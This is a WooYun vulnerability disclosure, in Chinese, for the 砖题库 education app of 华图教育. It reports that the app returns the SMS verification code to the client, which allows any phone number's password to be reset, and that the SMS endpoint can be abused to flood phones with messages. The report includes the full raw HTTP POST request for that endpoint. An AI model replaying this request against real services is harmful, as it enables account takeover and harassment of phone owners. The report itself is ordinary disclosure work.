当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0180488

漏洞标题:砖题库APP任意手机号密码重置+短信轰炸

相关厂商:华图教育

漏洞作者: 路人甲

提交时间:2016-03-03 21:16

修复时间:2016-03-08 21:20

公开时间:2016-03-08 21:20

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-03: 细节已通知厂商并且等待厂商处理中
2016-03-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.netschool.main.ui

QQ截图20160303150626.png


发送验证码后,验证码直接返回
输入验证码,即可重置成功

QQ截图20160303150803.png


登录

QQ截图20160303150849.png


主站登录验证

QQ截图20160303150918.png


短信轰炸

QQ截图20160303151024.png


POST http://ns.huatu.com/nsapi/base/captcha/phone HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
sid: 0
username:
qqopenid: 0
imei: 08:00:27:b4:8b:30
c_platform: android
userid: 0
ua: Google Galaxy Nexus - 4.3 - API 18 - 720x1280_2-Android4.3
areaid: 0
c_version: NetSchool_1.6.9_yyb99002721_android
channel: yyb99002721
key: NS
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; Google Galaxy Nexus - 4.3 - API 18 - 720x1280_2 Build/JLS36G)
Host: ns.huatu.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 18
phone=手机号&


漏洞证明:

如上

修复方案:

取消回显

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-08 21:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价